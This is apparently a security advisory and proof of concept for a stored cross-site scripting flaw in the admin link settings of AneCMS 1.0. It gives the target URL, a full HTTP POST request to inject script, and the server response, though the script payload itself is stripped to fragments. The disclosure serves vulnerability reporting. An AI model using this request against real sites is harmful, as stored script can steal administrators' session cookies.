source: https://www.securityfocus.com/bid/38657/info AneCMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. AneCMS 1.0 is vulnerable; other versions may also be affected. ======================================================================= ANE CMS 1 Persistent XSS Vulnerability ======================================================================= by Pratul Agrawal # Vulnerability found in- Admin module # email Pratulag@yahoo.com # company aksitservices # Credit by Pratul Agrawal # Software ANE CMS 1 # Category CMS / Portals # Plateform php # Proof of concept # Targeted URL: http://server/acp/index.php?p=cfg&m=links In ADD LINKS Field provide the malicious script to store in the Database. That is-
"> ">
======================================================================= Request - ======================================================================= POST /acp/index.php?p=cfg&m=links&id=0 HTTP/1.1 Host: server User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http://server/acp/index.php?p=cfg&m=links Cookie: PHPSESSID=200fecb6b36334b983ebe251d11a5df9 Content-Type: application/x-www-form-urlencoded Content-Length: 41 name=">&link=">&type=1&view=0 ======================================================================= ======================================================================= Response- ======================================================================= HTTP/1.1 200 OK Date: Thu, 11 Mar 2010 06:59:03 GMT Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset: utf-8 Content-Length: 7771  Transdmin Light

Administration

Configuration ยป Links


Aggiungi un nuovo Link

Barra Links Menu Links

Name Link Options
Bar Links
Home index.php Modify Delete Move Down
Blog blog Modify Delete Move up Move Down
Registrati register Modify Delete Move up Move Down
ACP acp Modify Delete Move up Move Down
Widgets index.php?modifywidgets Modify Delete Move up Move Down
master master.asp Modify Delete Move up Move Down
"> "> Modify Delete Move up Move Down
Menu Links
home index.php Modify Delete Move up Move Down
Blog blog Modify Delete Move up Move Down

======================================================================= After completion Just Refres the page and the script get executed again and again. #If you have any questions, comments, or concerns, feel free to contact me.